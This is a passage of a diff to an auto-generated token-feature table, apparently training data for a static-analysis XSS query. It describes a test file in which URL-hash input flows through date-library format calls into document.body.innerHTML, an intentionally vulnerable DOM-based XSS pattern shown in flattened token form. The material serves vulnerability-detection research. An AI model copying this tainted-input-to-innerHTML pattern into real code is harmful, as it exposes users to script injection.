autogenerated/Xss/DomBasedXss/dates.js:40:42:40:61 | dayjs.formatByString | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:40:42:40:61 | dayjs.formatByString | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:40:42:40:61 | dayjs.formatByString | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:40:42:40:82 | dayjs.f ... taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:40:42:40:82 | dayjs.f ... taint) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:40:42:40:82 | dayjs.f ... taint) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:40:42:40:82 | dayjs.f ... taint) | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:40:42:40:82 | dayjs.f ... taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:40:42:40:82 | dayjs.f ... taint) | stringConcatenatedWith | 'Time is ' -endpoint- | +| autogenerated/Xss/DomBasedXss/dates.js:40:42:40:82 | exceptional return of dayjs.f ... taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:40:42:40:82 | exceptional return of dayjs.f ... taint) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:40:42:40:82 | exceptional return of dayjs.f ... taint) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:40:42:40:82 | exceptional return of dayjs.f ... taint) | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:40:42:40:82 | exceptional return of dayjs.f ... taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:40:48:40:61 | formatByString | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:40:48:40:61 | formatByString | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:40:48:40:61 | formatByString | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:40:48:40:61 | formatByString | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:40:48:40:61 | formatByString | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:40:63:40:67 | dayjs | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:40:63:40:67 | dayjs | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:40:63:40:67 | dayjs | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:40:63:40:67 | dayjs | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:40:63:40:67 | dayjs | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:40:63:40:72 | dayjs.date | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:40:63:40:72 | dayjs.date | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:40:63:40:72 | dayjs.date | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:40:63:40:72 | dayjs.date | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:40:63:40:72 | dayjs.date | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:40:63:40:74 | dayjs.date() | CalleeFlexibleAccessPath | dayjs.formatByString | | autogenerated/Xss/DomBasedXss/dates.js:40:63:40:74 | dayjs.date() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:40:63:40:74 | dayjs.date() | calleeImports | @date-io/dayjs | @@ -13143,6 +98035,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:40:63:40:74 | dayjs.date() | enclosingFunctionName | dateio | | autogenerated/Xss/DomBasedXss/dates.js:40:63:40:74 | dayjs.date() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:40:63:40:74 | dayjs.date() | receiverName | dayjs | +| autogenerated/Xss/DomBasedXss/dates.js:40:63:40:74 | exceptional return of dayjs.date() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:40:63:40:74 | exceptional return of dayjs.date() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:40:63:40:74 | exceptional return of dayjs.date() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:40:63:40:74 | exceptional return of dayjs.date() | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:40:63:40:74 | exceptional return of dayjs.date() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:40:69:40:72 | date | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:40:69:40:72 | date | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:40:69:40:72 | date | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:40:69:40:72 | date | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:40:69:40:72 | date | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:40:77:40:81 | taint | CalleeFlexibleAccessPath | dayjs.formatByString | | autogenerated/Xss/DomBasedXss/dates.js:40:77:40:81 | taint | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/dates.js:40:77:40:81 | taint | calleeImports | @date-io/dayjs | @@ -13152,6 +98054,111 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:40:77:40:81 | taint | enclosingFunctionName | dateio | | autogenerated/Xss/DomBasedXss/dates.js:40:77:40:81 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:40:77:40:81 | taint | receiverName | dayjs | +| autogenerated/Xss/DomBasedXss/dates.js:43:1:43:33 | import ... luxon"; | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:43:1:43:33 | import ... luxon"; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:43:1:43:33 | import ... luxon"; | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:43:10:43:17 | DateTime | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:43:10:43:17 | DateTime | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:43:10:43:17 | DateTime | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:43:10:43:17 | DateTime | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:43:10:43:17 | DateTime | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:43:10:43:17 | DateTime | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:43:10:43:17 | DateTime | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:43:10:43:17 | DateTime | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:43:10:43:17 | DateTime | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:43:10:43:17 | DateTime | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:43:10:43:17 | DateTime | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:43:10:43:17 | DateTime | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:43:10:43:17 | DateTime | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:43:26:43:32 | "luxon" | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:43:26:43:32 | "luxon" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:43:26:43:32 | "luxon" | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:45:0 | DateTime | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:45:0 | DateTime | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:45:0 | DateTime | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:45:0 | DateTime | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:45:0 | DateTime | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:45:0 | this | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:45:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:45:0 | this | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:45:0 | this | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:45:0 | this | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:51:1 | 'arguments' object of function luxon | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:51:1 | 'arguments' object of function luxon | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:51:1 | 'arguments' object of function luxon | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:51:1 | 'arguments' object of function luxon | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:51:1 | 'arguments' object of function luxon | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:51:1 | exceptional return of function luxon | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:51:1 | exceptional return of function luxon | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:51:1 | exceptional return of function luxon | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:51:1 | exceptional return of function luxon | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:51:1 | exceptional return of function luxon | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:51:1 | functio ... OT OK\\n} | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:51:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:51:1 | functio ... OT OK\\n} | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:51:1 | return of function luxon | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:51:1 | return of function luxon | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:51:1 | return of function luxon | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:51:1 | return of function luxon | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:45:1:51:1 | return of function luxon | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:45:10:45:14 | luxon | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:45:10:45:14 | luxon | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:45:10:45:14 | luxon | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:46:9:46:13 | taint | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:46:9:46:13 | taint | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:46:9:46:13 | taint | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:46:9:46:13 | taint | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:46:9:46:13 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:46:9:46:69 | taint | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:46:9:46:69 | taint | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:46:9:46:69 | taint | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:46:9:46:69 | taint | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:46:9:46:69 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:46:9:46:69 | taint = ... ing(1)) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:46:9:46:69 | taint = ... ing(1)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:46:9:46:69 | taint = ... ing(1)) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:46:9:46:69 | taint = ... ing(1)) | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:46:9:46:69 | taint = ... ing(1)) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:46:17:46:34 | decodeURIComponent | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:46:17:46:34 | decodeURIComponent | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:46:17:46:34 | decodeURIComponent | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:46:17:46:34 | decodeURIComponent | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:46:17:46:34 | decodeURIComponent | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:46:17:46:69 | decodeU ... ing(1)) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:46:17:46:69 | decodeU ... ing(1)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:46:17:46:69 | decodeU ... ing(1)) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:46:17:46:69 | decodeU ... ing(1)) | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:46:17:46:69 | decodeU ... ing(1)) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:46:17:46:69 | exceptional return of decodeU ... ing(1)) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:46:17:46:69 | exceptional return of decodeU ... ing(1)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:46:17:46:69 | exceptional return of decodeU ... ing(1)) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:46:17:46:69 | exceptional return of decodeU ... ing(1)) | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:46:17:46:69 | exceptional return of decodeU ... ing(1)) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:41 | window | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:41 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:41 | window | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:41 | window | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:41 | window | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:50 | window.location | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:50 | window.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:50 | window.location | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:50 | window.location | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:50 | window.location | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:55 | window.location.hash | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:55 | window.location.hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:55 | window.location.hash | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:55 | window.location.hash | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:55 | window.location.hash | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:65 | window. ... bstring | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:65 | window. ... bstring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:65 | window. ... bstring | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:65 | window. ... bstring | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:65 | window. ... bstring | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:68 | exceptional return of window. ... ring(1) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:68 | exceptional return of window. ... ring(1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:68 | exceptional return of window. ... ring(1) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:68 | exceptional return of window. ... ring(1) | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:46:36:46:68 | exceptional return of window. ... ring(1) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:46:36:46:68 | window. ... ring(1) | CalleeFlexibleAccessPath | decodeURIComponent | | autogenerated/Xss/DomBasedXss/dates.js:46:36:46:68 | window. ... ring(1) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:46:36:46:68 | window. ... ring(1) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | @@ -13159,6 +98166,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:46:36:46:68 | window. ... ring(1) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | | autogenerated/Xss/DomBasedXss/dates.js:46:36:46:68 | window. ... ring(1) | enclosingFunctionName | luxon | | autogenerated/Xss/DomBasedXss/dates.js:46:36:46:68 | window. ... ring(1) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:46:43:46:50 | location | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| 